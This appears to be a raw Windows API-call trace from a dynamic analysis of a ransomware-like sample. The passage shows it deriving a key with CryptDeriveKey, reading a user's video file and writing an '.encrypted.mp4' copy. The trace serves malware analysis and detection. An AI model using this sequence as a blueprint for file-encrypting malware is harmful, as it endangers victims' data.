(in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.642] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0042.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.642] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0042.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.642] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.642] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0042.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.643] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.643] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.643] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.643] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0042.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.643] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0042.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.643] CryptDestroyHash (hHash=0x7c2240) returned 1 [0042.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.643] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.643] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.644] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.644] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\yqgdwwozy63yzvixse8a.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.644] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.644] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0042.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0042.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0042.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0042.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.644] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0042.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0042.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0042.644] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0042.644] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0042.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0042.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0042.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.646] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl")) returned 0x10 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0042.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\yQGDwWOzy63yZvixsE8A.encrypted.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\yqgdwwozy63yzvixse8a.encrypted.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0042.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0042.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.647] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0042.647] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0042.647] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0042.647] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0042.648] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0042.648] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0042.651] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x4128, lpOverlapped=0x0) returned 1 [0042.651] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0042.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0042.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14128) returned 0xac2018 [0042.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0042.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0042.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0042.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0042.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14128) returned 0x935008 [0042.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.655] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14128) returned 0xac2018 [0042.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0042.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.655] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0042.655] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.655] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0042.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0042.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14128) returned 0xac2018 [0042.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0042.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0042.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0042.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0042.656] HeapFree 